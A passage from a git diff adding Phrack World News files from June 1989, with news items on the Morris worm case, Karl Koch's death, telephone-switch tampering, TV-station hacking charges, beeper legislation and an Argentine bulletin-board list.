+orders, according to an affidavit filed in U.S. District Court.
+
+If convicted, she faces up to 10 years in prison and a $250,000 fine.
+
+               Special Thanks to Jedi For Additional Information
+_______________________________________________________________________________
+
+HR 1504 -- Beeper Abuse Prevention Act                             May 22, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                 "Pagers Don't Commit Crimes, Congressmen Do."
+
+The fools in congress assembled are at it again.  Three years in jail for
+selling a pager to a minor?  If you didn't believe when Abbie Hoffman said that
+the drug hysteria was just an excuse for more control of the citizens, think
+again.
+
+In USA Today was a "face-off" on the issues.  According to this article,
+Representative Kweisi Mfume (D-Md) says the following:
+
+     "The drug business is using the  latest technology to promote its
+     deadly trade.  One such advance, the paging device, or beeper, is
+     now appearing in classrooms and schoolyards.  I have introduced the
+     Beeper Abuse Prevention Act to curtail the use of beepers by young
+     people who deal drugs.  It would require the Federal Communications
+     Commission to prescribe regulations that would restrict the
+     possession and use of paging devices by persons under age 21.
+
+     Law officers say dealers and suppliers send coded messages via
+     beeper to youths in school.  The codes translate into messages like
+     "meet me at our regular place after class to pick up the drugs."
+     Drug traffickers are even using 800 numbers now available with
+     regional paging services.  A supplier could actually conduct a
+     transaction in Baltimore from Miami, for example.
+
+     My bill, H.R. 1504, would require any person selling or renting
+     paging devices to verify the identification and age of every
+     customer; encourage parents and businesses to take more
+     responsibility in their children's or employees' activities; make
+     it unlawful for a person to knowingly and willfully rent, sell or
+     use paging devices in violation of rules prescrived by the FCC
+     (there are provisions for stiff fines and up to three-year prison
+     terms for adults who illegally provide beepers to youths); and
+     require parents or businesses who allow the use of beepers to state
+     that intention with and affidavit at the time of purchase."
+
+He goes on to say that he recognizes that there are legitimate uses of beepers,
+but we can no longer stand by and watch drugs flow into our neighborhoods.  The
+opposite side is taken by Lynn Scarlett, from Santa Monica, CA.  She asks what
+beepers have to do with the drug trade, and regulating their use will not put a
+dent it it.  She also says that there is little evidence that gun control keeps
+guns out of the hands of gangsters, and it will take a good dose of wizardry to
+keep beepers away from bad guys.  She finishes with:
+
+     "The logic of the Beeper Abuse Prevention Act opens the door for
+     laws to make us sign promises that we won't, we swear, use these
+     things for illicit acts when we buy them.  De Tocqueville, that
+     eminent observer of our nation, warned that our loss of freedom
+     would sneak in through passage of quiet, seemingly innocuous and
+     well-intended laws -- laws like H.R. 1504.
+_______________________________________________________________________________
+
+Computer Threat Research Association (UK)                        March 31, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+For those of you interested an umbrella organization has been established in
+the United Kingdom to coordinate information on, and research into, all aspects
+of computer security.  In the first instance one of the organization's primary
+concerns will be combatting the threat posed by computer viruses by acting as a
+clearing house for virus information and control software.
+
+Below is a copy of an initial letter mailed to prospective members:
+
+                   The Computer Threat Research Association
+
+The computer threat research association, CoTra is a non-profit making
+organization that exists to research, analyze, publicize and find solutions
+for threats to the integrity and reliability of computer systems.
+
+The issue that caused the formation of CoTra was the rise of the computer
+virus.  This problem has since become surrounded by fear, uncertainty and
+doubt.  To the average user, the computer virus and its implications are a
+worry of an unknown scale.  To a few unfortunates whose systems have become
+victims, it is a critical issue.
+
+The key advantage of CoTra membership will be access to advice and information.
+Advice will be provided through publications, an electronic conference (a
+closed conference for CoTra's members has been created on the Compulink CIX
+system) as well as other channels such as general postings direct to members
+when a new virus is discovered.
+
+CoTra membership will be available on a student, full or corporate member
+basis.  All software that is held by CoTra that enhances system reliability,
+such as virus detection and removal software, will be available to all members.
+It is intended to establish discounts with suppliers of reliability tools and
+services.  A library of virus sources and executables and other dangerous
+research material will be made available to members who have a demonstrable
+need.
+
+A register of consultants who have specific skills in the systems reliability
+field will be published by CoTra and reviews of reliability enhancing software
+will be produced.
+
+Your support of CoTra will ensure that you have the earliest and most accurate
+information about potential threats to your computer systems.
+
+CoTra, The Computer Threat Research Association,
+c/o 144 Sheerstock, Haddenham, Bucks.  HP17 8EX
+_______________________________________________________________________________
+
+Strange Customs Service Clock Department                            May 1, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Written by Vanessa Jo Grimm (Goverment Computer News)(Page 6)
+
+The U.S. attorney for Washington is reviewing an allegation that a Customs
+Service official violated the Computer Security Act [PL 100-235 presumably] by
+altering a computer's internal clock.
+
+Treasury Department Inspector General Michael R. Hill referred the allegation
+to the prosecutor after an investigation into year-end spending by Custom
+officials at the close of Fiscal Year 1988.  The allegation involves an
+official who may have authorized altering the date maintained by the computers
+that the agency uses for procurement documents, according to Maurice S. Moody,
+the Inspector General's audit director for Financial Management Service.
+
+Moody recently told the House Ways and Means Subcommittee on Oversight the
+computers are part of the agency's Automated Commercial System.  He declined to
+provide Government Computer News with more details.
+
+Allegedly the computer clock was rolled back during the first three days of
+October of 1988 so that $41.8 million in procurement obligations would be dated
+in September against fiscal year 1988 appropriations, Moody said.
+
+An inspector general report issued in late February concluded Customs had not
+violated any procurement laws.  The inspector general's investigation is
+continuing, however.
+
+"Doesn't $41.8 million worth of procurement on the last day of the fiscal year
+bother anybody?" asked Rep. Richard T. Shulze (R-Pa).  The purchases did bother
+the inspector general, Moody said, and this concern led to getting the United
+State attorney attorney.  "This problem is endemic in the federal government,"
+he said.  "Year-end spending is very common."
+
+William F. Riley, Customs controller, said he knew about the rollback, but he
+and Deputy Commissioner Michael H. Lane refused to say who authorized the
+action...  Subcommittee members continued to press Riley and Lane.  "Is the
+person still at Customs?" asked subcommittee chairman J. J. Pickle (D-Texas).
+He is working full time and in the position he was at the time," Lane answered.
+
+Rep. Beryl F. Anthony, Jr. (D-Ark) asked how Riley became aware of the
+rollback.  "He (the official who authorized the rollback) told me that it was
+going to be done," Riley said.
+
+Rep. Pickle suggested that a high ranking official would have to authorize such
+an action, but Counsel advised Lane not to reply.  He did say neither he nor
+Commissioner von Raab had made the decision.
+
+The balance of the article deals with the actions of Linda Gibbs, who became
+aware of the incident and reported it to the inspector general after being
+unable to stop the action.  Gibbs also alleged that the action was intended to
+use available year-end money to cover cost overrun on a contract with Northrop
+Corp.  She also alleged that she had been reassigned and given no new duties.
+_______________________________________________________________________________
diff --git a/phrack27/11.txt b/phrack27/11.txt
new file mode 100644
index 0000000..74891a2
--- /dev/null
+++ b/phrack27/11.txt
@@ -0,0 +1,460 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 11 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXVII/Part 2                PWN
+            PWN                                                 PWN
+            PWN                  June 20, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Robert T. Morris Suspended From Cornell                            May 25, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from the New York Times
+
+Cornell University has suspended the graduate student identified by school
+officials as the author of "the Internet worm."
+
+In a May 16th letter to Robert Tappan Moris, age 23, the dean of the Cornell
+University Graduate School said a university panel had found him guilty of
+violating the school's Code of Academic Integrity.
+
+He will be suspended until the beginning of the fall semester of 1990, and then
+could reapply.
+
+No criminal charges have been filed against Morris.  A federal grand jury this
+year forwarded its recommendations to the Justice Department, which has not
+taken any action.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Justice Department Wary in Computer Case                           May 28, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Matthew Spina (Syracuse Herald-American)
+
+              "Is Washington Fearful Of Losing A Landmark Trial?"
+
+Some computer experts theorize that the Justice Department, afraid of bungling
+what could become a landmark computer case, still doesn't know how to treat the
+Cornell student whose computer worm slithered nationwide in November, 1988.
+
+A further concern in Washington:  A trial in the case might embarrass the
+Department of Defense if its scientists are asked to detail how their computers
+were among the thousands crippled by the worm.
+
+For several months, the decision on how to charge 23-year-old Robert T. Morris,
+Jr. had been before Mark Richard, a deputy assistant attorney general.  Within
+the last few weeks, Richard made a decision that now is being reviewed by an
+assistant attorney general, according to a computer professional who has been
+talking with the Justice Department.
+
+"I thought we would have heard something from Washington by now," said Andrew
+Baxtoer, the assistant U.S. attorney who in November and December presented the
+case to a grand jury in Syracuse.
+
+The grand jury's report was sent on the the Justice Department, which refuses
+to comment publicly on the matter because Morris has not been indicted.
+
+"Within the next two weeks I assume that a decision will be made," said one
+official.
+
+"If they decide to begin an expensive trial, they have to make sure they win so
+as not to damage future attempts to prosecute under that law," said Eugene H.
+Spafford, an assistant professor at Purdue University whose analysis of the
+worm has helped federal investigators.  "If they decide not to prosecute, and
+the total thing that happens is he gets suspended (from Cornell), I will be
+outraged."
+
+So far, Cornell has taken the only disciplinary measure against Morris,
+suspending him for the 1989-90 academic year.  But the graduate student left
+the computer science department early in November, the day after the worm
+spread out of a computer in Upson Hall.
+
+Morris, a computer science graduate student, has been called the author of a
+rogue computer program, called a worm, that was spread from a Cornell
+University computer.  The program was designed to reproduce and infect any
+computer linked to the Internet, a network shared by colleges, research centers
+and military institutions.
+
+However, experts say an error caused the program to replicate out of control,
+sending thousands of copies into thousands of computers.
+
+If Morris is to be charged with a felony, prosecutors would then have to show
+he intended to destroy or extract information.
+
+Proving that would be difficult since the program neither destroyed nor removed
+information from any computer.
+
+To convict Morris on most lesser charges, prosecutors would have to show he
+intended to harm computers.
+
+Prosecutors also could use a misdemeanor charge requiring them to prove only
+that Morris gained access to a federal government computer. The worm did reach
+computers at the Army Ballistics Research Laboratory and NASA's Langley
+Research Center, among others.
+
+Some computer experts wonder, though, if Defense Department officials will be
+reluctant to testify publicly about how their computers were penetrated -- even
+those computers holding non-classified information. In February, at a computer
+convention in San Diego, Defense Department computer experts detailed some
+security improvements made to the network since November, but then refused to
+release copies of their presentation to people at the seminar.
+
+The FBI -- which enforces the Computer Fraud and Abuse Act of 1986 -- and some
+people in the computer industry are pushing for a vigorous prosecution to
+display a strong case against computer hacking.  Others in the industry,
+including some of Morris' friends from Harvard University and Cornell, urge
+leniency because he was trying to demonstrate security flaws with computers.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Other articles about Robert Tappan Morris, Jr. and the Internet Worm are;
+
+"Computer Network Disrupted By 'Virus'"            (11/03/88) PWN XXII/Part 2
+"Virus Attack"                                     (11/06/88) PWN XXII/Part 2
+"The Computer Jam:  How It Came About"             (11/08/88) PWN XXII/Part 2
+"US Is Moving To Restrict {...} Virus"             (11/11/88) PWN XXII/Part 2 *
+"FBI Studies Possible Charges In Virus"            (11/12/88) PWN XXII/Part 2
+"Big Guns Take Aim At Virus"                       (11/21/88) PWN XXII/Part 3
+"Congressman Plan Hearings On Virus"               (11/27/88) PWN XXII/Part 3
+"Pentagon Severs Military {...} Virus"             (11/30/88) PWN XXII/Part 3 *
+"Networks Of Computers At Risk From Invaders"      (12/03/88) PWN XXII/Part 4 *
+"Computer Virus Eradication Act of 1988"           (12/05/88) PWN XXII/Part 4 *
+"Breaking Into Computers {...}, Pure and Simple"   (12/04/88) PWN XXIV/Part 1 *
+"Cornell Panel Concludes Morris {...} Virus"       (04/06/89) PWN XXVI/Part 1
+
+* - Indicates that the article was not directly related to Robert Morris, but
+    did discuss him as well as the Internet Worm incident.
+_______________________________________________________________________________
+
+SouthernNet's Anti-Hacker Psychological Con Game                     April 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+WARNING!  Your call is being intercepted!
+
+Error:  Setting may not be changed by callers.
+
+
+                  Welcome to:  S o u t h e r n N e t   I n c.
+
+
+You have reached the SouthernNet Fraud Department, the authorization code you
+are attempting to use is not valid.  Hacking and illegal use of codes are
+violations of state and federal laws.
+
+We are currently conducting an investigaion for code abuse in your area and we
+are coordinating the investigation with law enforcement authorities. Persons
+identified hacking or abusing codes will be prosecuted to the full extent of
+the law.
+
+I'll see you soon,
+
+Hacker Tracker
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Hold for additional information:
+
+Hacker Tracker is unavailable right now; however, you may avoid possible arrest
+and/or prosecution by calling Hacker Tracker in person.
+
+You may contact Mr. Tracker between the hours of 9:00 AM and 5:00 PM Eastern
+Standard Time, Monday - Friday, simply by dialing the access number you have
+just used and code number 101010 or 011010 if the access  you have used
+requires a seven digit code.  Just hold the line for 10 seconds and your call
+will automatically be routed to Mr. Tracker at no charge to you.
+
+This is *NOT* a trick and it will be the intention of SouthernNet Inc. to
+settle this matter without involving law enforcement authorities if you
+cooperate with our fraud department 100%.
+
+It will certainly be to your advantage to contact Mr. Tracker as this will
+reflect your own decision to assist and avoid prosecution by our company!!!
+
+I'll be expecting your call.
+
+Hacker Tracker
+
+Hold a sec... Engaging Auto Page for Hacker Tracker...
+
+      50 seconds till disconnect
+      40 seconds till disconnect
+      30 seconds till disconnect
+      20 seconds till disconnect
+      10 seconds till disconnect
+       5 seconds till disconnect
+
+NO CARRIER
+
+
+ [Do you think anyone believed this and actually called "Hacker Tracker?" -KL]
+_______________________________________________________________________________
+
+What's Happening:  Computer Security Up                            June 4, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from Gannett Westchester Newspapers
+
+                   [Comments in brackets from Delta-Master]
+
+High-tech companies are spending 64% more [than they previously spent] on
+computer security, according to a recent survey conducted by the National
+Center for Computer Crime Data in Los Angeles.  The group surveyed 3,500 law
+enforcement agencies and computer security experts about computer crime.  The
+prosecution rate is also up -- 6.4% in 1988 from only 2.4% during 1987.
+
+Contrary to popular image, computer hackers aren't always young boys.  The
+study found that 32% of those arrested for computer crimes were female, while
+only 14% were under 21.  The study said 45% of hackers were 25 to 30 years old.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Comments from Delta-Master
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+I do not know about you people, but the public's confusion about hackers starts
+to bother me when they make errors.  Seriously, I know of only a few hackers
+over the age of 21.  The fact that the newspapers also equate the thug-like
+computer criminals with the mastermind-criminal type hacker (you guys) is also
+pretty annoying, wouldn't you agree?  One key phrase you must note: "32% OF
+THOSE ARRESTED."  Oh well, such are the mistakes of newspapers.
+_______________________________________________________________________________
+
+Public Service Commission Bans Operator Companies                April 24, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Jerri Stroud (St. Louis Post-Dispatch)
+
+The Missouri Public Service Commission voted 4-1 last week to ban providers of
+so-called alternative operator services in Missouri because allowing the
+companies to operate is "not in the public interest."
+
+Alternative operator services companies contract with hotels, motels colleges,
+hospitals, airports, restaurants and other facilities to provide operator
+assistance to customers using pay telephones or house phones.  Consumer groups
+have complained about price-gouging by the companies nationwide.
+
+Mark Wheatley, a lawyer for the Office of Public Council, praised the
+commission's decision.
+
+The Office of Public Council has received numerous complaints about excessive
+rates and surcharges by alternative operator services companies, said Wheatley.
+Some alternative operator services companies also have accepted other
+companies' credit cards without authorization from the companies issuing the
+cards, he said.
+
+"We feel that it's an extremely important decision by the commission." said
+Wheatley.  But he said he expects the companies affected by the ruling to
+appeal.
+
+Lawyers for the alternative operator services companies could not be reached
+for comment.
+
+In it's ruling, the commission said many consumers aren't aware of the rates
+charged by the alternative operator services companies until they receive "a
+bill for operator services at prices higher than those to which he is
+accustomed."  Consumer groups say the rates often are twice or three times the
+rates charged by better-known long-distance companies.
+
+Even if an operator service company identifies itself when a consumer makes a
+call, the commission said many consumers don't understand the significance of
+the identification.
+
+"If the end user is not educated as to the intricacies of using an alternative
+operator services provider, he does not truly have a meaningful choice..." the
+commission said.
+
+The ruling only affects intrastate calls handled by alternative operator
+services companies, but it may effectively prevent the companies from providing
+interstate service as well.
+
+The commission specifically denied tariff requests from International
+Telecharge Inc. and American Operator Services Inc.  The commission also
+directed three other companies -- Teleconnect Inc., Dial US, and Dial USA -- to
+file new tariffs consistent with the ruling.
+
+The ruling allows companies to operate who provide operator services in
+connection with their business -- long-distance carriers and local telephone
+companies, for example.  But the commission also placed limits on these
+companies.
+
+Under the ruling, operator services companies must:
+
+     * Identify themselves to the caller as well as to the party being billed
+       by the call (in the case of a collect or third-party call).
+
+     * Quote rates to the caller or billed party on request, without charge.
+
+     * Use calling card verification procedures acceptable to the companies
+       issuing the cards.
+
+     * Post in a prominent position the company's name, detailed complaint
+       procedures and instruction on how to reach the local telephone company
+       operator and other long-distance carriers.
+
+     * Transfer emergency traffic to the local telephone company or American
+       Telephone & Telegraph Co. until the alternative services provider can
+       show that it can handle emergency calls adequately.
+_______________________________________________________________________________
+
+Fax Attack                                                         May 13, 1989
+~~~~~~~~~~
+Taken from The Ann Arbor News
+
+       "Governor's Attempt To Ban Unsolicited Advertisements Backfires!"
+
+HARTFORD, Conn - The great fax attack of 1989 -- an all-out lobbying campaign
+against a bill banning unsolicited facsimile advertising -- may have backfired
+when the governor's fax machine was jammed for hours with unwanted messages.
+
+Starting Thursday, May 11, and continuing Friday, May 12, Governor William A.
+O'Neill's fax machine has been beeping constantly, spitting out unwanted
+messages from angry businesses that advertise by fax.
+
+The businesses oppose a bill now awaiting O'Neill's signature that would
+prohibit them from marketing their products by fax without first obtaining the
+permission of the recipient.  Violators would face a $200 fine.
+
+Starting Thursday morning, dozens of Connecticut businesses faxed to O'Neill's
+office a form letter arguing against the fax ban.  The stream of fax messages
+was so constant (40 came in before 10 AM) that the governor's office turned off
+the fax machine Thursday (May 11).
+
+O'Neill's press secretary, Jon. L. Sandberg, said the governor still hasn't
+decided whether he will sign the bill.  But aides to the governor said the
+persistent lobbying campaign proved how annoying unwanted messages can be.  The
+inconvenience was compounded because the governor's office was unable to use
+its fax machine to receive information about spring flooding around the state.
+_______________________________________________________________________________
+
+NYNEX Announces Info-Look Gateway                                April 28, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Introducing a new service for accessing information and more... all through
+your personal computer!
+
+Starting in May 1989, New York Telephone's INFO-LOOK (tm) Gateway Service can
+be your link to accessing a variety of information, products and services.
+
+The INFO-LOOK Gateway simplifies on-line computer access to a variety of
+information providers.  When you call the Gateway phone number through your
+modem, you'll be able to scan a menu of information services.
+
+The types of information services you may choose from include:  Entertainment,
+business, health, food, news, weather, sports, travel, government, educational
+and reference information.  The services, some interactive, are provided by
+independent companies.
+
+The INFO-LOOK Gateway is easy to use -- even if you're relatively new to using
+a PC.
+
+What you'll need to use the INFO-LOOK Gateway
+
+1.  Virtually any type of personal computer.
+
+2.  A modem (300, 1200, or 2400 Baud), and communications software.  This
+    enables your computer to communicate with other computers via the telephone
+    system.
+
+3.  A New York Telephone Calling Card.  If you need a New York Telephone
+    Calling Card, (it's FREE), call your service representative whose number
+    appears on page one of your New York Telephone bill.
+
+Charges for using the INFO-LOOK Gateway
+
+There are ** no ** Gateway enrollment fees and ** no ** monthly subscription
+charges.  In most cases, you will be charged (New York people only):
+
+o  A local call to reach the INFO-LOOK Gateway.
+
+o  While you're browsing the Gateway directory of services, or moving between
+   services, you pay $.05 a minute.
+
+o  Once you connect to a service, the charge is determined by the Service
+   Provider.  Some services have a per-minute usage charge.  Some services are
+   free.  The charges for each service are listed in the Gateway menu.
+
+You'll find most charges itemized on your monthly New York Telephone bill.
+Some Service Providers may decide to bill you separately and directly for use
+of their services.
+
+Call for more information:
+
+To get your free INFO-LOOK Gateway information booklet call (toll- free)
+1-800-338-2720, Ext. 20, any day from 9 a.m. to 11 p.m.
+
+Note:  New York Telephone does not provide or control the services offered
+       through the INFO-LOOK Gateway Service.  They are provided by independent
+       companies, which are responsible for the content, character, and quality
+       of their services.
+
+The predictions run $5 billion now and another $5-10 billion by 1991.
+
+       [INFO-LOOK is already operating in Bell South and Bell Atlantic.]
+_______________________________________________________________________________
+
+Pacific Bell Plans Access To Computers                             June 9, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from Santa Cruz Sentinel (Section B)
+
+SAN FRANCISCO (AP) -- Pacific Bell said Thursday it hopes to compete with the
+popularity of television by offering people easy access to computerized
+libraries, bulletin boards and the use of electronic mail.
+
+PacBell's California On-line -- which will be available to anybody with a
+personal computer, telephone and calling card -- will be among the first in the
+nation to use a graphic-based system that simplifies procedures so only a
+rudimentary familiarity with computers is needed.
+
+"It's going to offer our customers a supplement to their current leisure
+activities... and among other things we've seen (in trials) a lot of people
+who got away from the TV," said Roger P. Conrad, director of Videotex Gateway
+Services.
+
+"We feel this is a more productive way for people to spend their lives and we
+think a lot of users are going to agree," he added.  Users will pay
+"info-entrepreneurs" fees based on the time they use various services and will
+be billed on their monthly telephone statements.  Unlike some on-line
+information services, users do not have to subscribe ahead of time.
+
+Conrad said the types of services are limited only by vendors' imaginations.
+PacBell will make money by selling telecommunication line use to the companies.
+_______________________________________________________________________________
+
+Bulletin Boards Of Argentina                                       June 5, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Country Code = 54 (Argentina)
+City Code  = 1    (Buenos Aires)
+
+This list might be slightly incorrect due to the passage of time.  The last
+update was on December 23, 1986.
+
+Name                    Hours Of Operation       ======= Number=
+----
+Beta                    23:00 -  6:30     802-0288
+C-Mania                 21:00 -  7:00     362-8843
+CBM                     16:00 - 12:00      90-4988
+Century 21              24 hours          632-7070
+Cerebruss               24 hours           47-2717
+Cerebruss Information   ?                  48-8300
+                                           48-9886
+Databank                ?                  44-9760
+Drean Conection         ?                 953-2523
+Los Pinos               13:00 - 19:00      21-0375
+Magenta                 ?                 392-0124
+Magenta                 ?                 392-0016
+Maxes                   23:00 - 7:00      542-2695
+Mendieta                22:00 - 8:00      654-6999
+Pirates Cove            24:00 - 6:00      783-5023
+Sanctuary               24:00 - 3:00      641-4608
+Soft-work               22:30 - 9:00       88-2065
+TCConection             19:00 - 12:00      22-4197
+The Connection          24 Hours           82-5780
+The Hacker              23:00 - 7:00      748-2005
+Tiger                   ?                 784-2226
+XCASA                   ?                 611-8136
+BBS-IOM                 24 Hours          804-3602
+
+Note:  The settings for all systems listed above are Even, 7, 1.
+
+                              Contributed by Noli
+_______________________________________________________________________________
diff --git a/phrack27/12.txt b/phrack27/12.txt
new file mode 100644
index 0000000..347c691
--- /dev/null
+++ b/phrack27/12.txt
@@ -0,0 +1,386 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 12 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXVII/Part 3                PWN
+            PWN                                                 PWN
+            PWN                  June 20, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+One of Cliff Stoll's "Wily Hackers" Is Dead (Suicide?)             June 5, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+According to West German publications, the "Wily Hacker" Karl Koch, of
+Hannover, West Germany, died Friday, June 3, probably by suicide.  His body was
+found burnt (with gasoline) to death, in a forest near Celle (a West German
+town near Hannover where he committed his hacks, as had been observed by German
+Post).
+
+Koch was one of the 2 hackers who confessed their role in the KGB hack to the
+public prosecutors, therewith bringing the case to public attention.  As German
+newspapers report, he probably suffered from a psychic disease:  He thought he
+was permanently observed by alien beings named Illimunates' which tried to kill
+him.  Probably, he had internalized the role of "Captain Hagbard" (his
+pseudonym in the hacking scene), taken from a U.S. book, who (like him)
+suffered from supervision by the Illuminates. Police officials evidently think
+that Koch committed suicide (though it is believed, that there are "some
+circumstances" which may also support other theories; no precise information
+about such moments are reported).
+
+According to German police experts, Karl Koch's role in the KGB case as in
+daily life can properly be understood when reading this unknown book.
+
+                   Information Provided by Klaus Brunnstein
+                            (University of Hamburg)
+
+                                        [Illuminates... KGB... whatever... -KL]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Illuminatus!                                                      June 14, 1989
+~~~~~~~~~~~~
+The book in question is believed to be "Illuminatus!" by Harold Shea and Robert
+Anton Wilson.  The book is a spoof on conspiracy theories, and suggests that
+many and probably all human institutions are just fronts for a small group of
+"enlightened ones," who are themselves a front for the Time dwarves from
+Reticuli Zeta, or perhaps Atlantean Adepts, remnants of Crowley's Golden Dawn,
+or even more likely the Lloigor of H.P. Lovecraft's Cthulhu Mythos.  A leading
+character in this book is named Hagbard Celine.
+
+"Illuminatus!" is a fun read if you like psychedelia and paranoia.  It also
+seems to have influenced a lot of subsequent work, most notably Adams'
+"Hitchhiker's Guide to the Galaxy."  It is easy to see how an unbalanced mind,
+taking it literally, could be completely absorbed.  In fact "Illuminatus!"
+seems as if it was written with the intent of just this sort of programming,
+referring to it as "Operation Mindfuck."
+
+This is probably not a real danger for the vast majority of sane adults, but it
+may, tragically, have been the case here.  Or perhaps, no disrespect intended,
+Koch may in the course of various hacks really have discovered too much about
+the Illuminati.  After all, they are supposed to be the secret power behind the
+KGB :-)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+For more information on Clifford Stoll and the Wily Hackers of West Germany,
+please see:
+
+"Who Is Clifford Stoll?"        (No Date) Phrack World News issue XXII/Part 1
+"A Message From Clifford Stoll" (1/10/89) Phrack World News issue XXIII/Part 2
+
+And the following articles all found in Phrack World News issue XXV/Part 2:
+
+       "German Hackers Break Into Los Alamos and NASA"         (3/2/89)
+       "Computer Espionage:  Three 'Wily Hackers' Arrested"    (3/2/89)
+       "Computer Spy Ring Sold Top Secrets To Russia"          (3/3/89)
+       "KGB Computer Break-Ins Alleged In West Germany"        (3/3/89)
+       "News From The KGB/Wily Hackers"                        (3/7/89)
+_______________________________________________________________________________
+
+Sex Put On Probation By Mystery Hacker                            June 13, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Ft. Lauderdale News and Sun-Sentinel
+
+      "Yes, you sound very sexy, but I really need a probation officer."
+
+DELRAY BEACH, Fla. -- Callers trying to dial a probation office in Delray
+Beach, Fla on Monday, June 12, heard a smorgasbord of sex talk from a panting
+woman named Tina instead.
+
+Southern Bell telephone officials said a computer hacker reprogrammed their
+equipment over the weekend, routing overflow calls intended for the local
+probation office to a New York-based phone sex line.
+
+"People are calling the Department of Corrections and getting some kind of sex
+palace," said Thomas Salgluff, a spokesman for the Palm Beach County probation
+office.
+
+Southern Bell officials said it was the first time their switching equipment has
+been reprogrammed by an outside computer intruder.  Southern Bell provides
+local telephone service in Florida, Georgia, North Carolina, and South
+Carolina.
+
+"We're very alarmed," said Southern Bell spokesman Buck Passmore.  He said such
+a feat would require someone with considerable computer knowledge.
+
+The implications of such a computer breach are considerable.  Intercepting
+corporate communications, uncovering unlisted phone numbers, and tampering with
+billing information are all plausible consequences of computer security
+breaches at the the phone company.
+
+Hackers have invaded Southern Bell in the past, but they have never
+reprogrammed a telephone link, Passmore said.
+
+Security technicians from Southern Bell and AT&T are trying to trace the source
+of the computer breach, Passmore said.
+_______________________________________________________________________________
+
+Hacking For A Competitive Edge                                     May 12, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from the Los Angeles Times
+
+Two former Tampa, FLA TV news managers have been charged with illegally tapping
+into phone lines and computers at another station to gain a news edge over
+their competitors.  Former new director Terry Cole and assistant news director
+Michael Shapiro at WTSP-TV have been charged with 17 counts of computer hacking
+and conspiracy in the theft of information from WTVT-TV through computer phone
+lines, authorities said.  Their arraignment was set for May 19.
+
+If convicted, each could face a maximum prison sentence of 85 years.  The two
+were fired from WTSP when the station learned of the alleged thefts.  The
+break-ins began in November, 1988, but were not noticed until January 12, 1989,
+when WTVT's morning news producer noticed that files were missing, authorities
+said.
+
+Computer experts determined that an intruder had rifled the files.  Authorities
+said Shapiro knew WTVT's security system thoroughly because he had helped set
+it up while working there as an assignment manager before being hired away from
+WTVT in October.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+TV News Executives Fired After Hacking Charges From Rival
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Tampa, Fla. -- A Florida television station fired two news executives in the
+wake of reports that one of them allegedly penetrated a rival station's
+computer system and stole sensitive information.
+
+WTSP-TV (Channel 10), an ABC affiliate in St. Petersburg, announced that it had
+fired Assistant News Director Michael Shapiro and News Director Terry Cole.
+
+Shapiro was arrested on February 7th on felony charges for allegedly breaking
+into a computer system at WTVT-TV (Channel 13) on at least six occasions in
+January.  He was once employed by WTVT as an assistant manager and was
+responsible for administering the station's computer systems.
+
+Law enforcement officials seized from Shapiro's home a personal computer, 200
+floppy disks and an operating manual and user guide for software used at the
+rival station.
+
+He has been charged with 14 felony counts under Florida Statute 815, which
+covers computer-related crimes.  Each count carries a maximum sentence sentence
+of 15 years and a $10,000 fine.
+
+Vince Barresi, WSTP's vice-president and general manager, refused to comment on
+the two firings.  However, in a prepared statement, he said that he told
+viewers during an 11 PM newscast last Tuesday that the station acted to "avoid
+any questions about the objective way we do our business in keeping the public
+informed."
+
+Cole, who hired Shapiro last September, has not been charged by Florida law
+enforcement officials.  He was fired, according to one source, because as
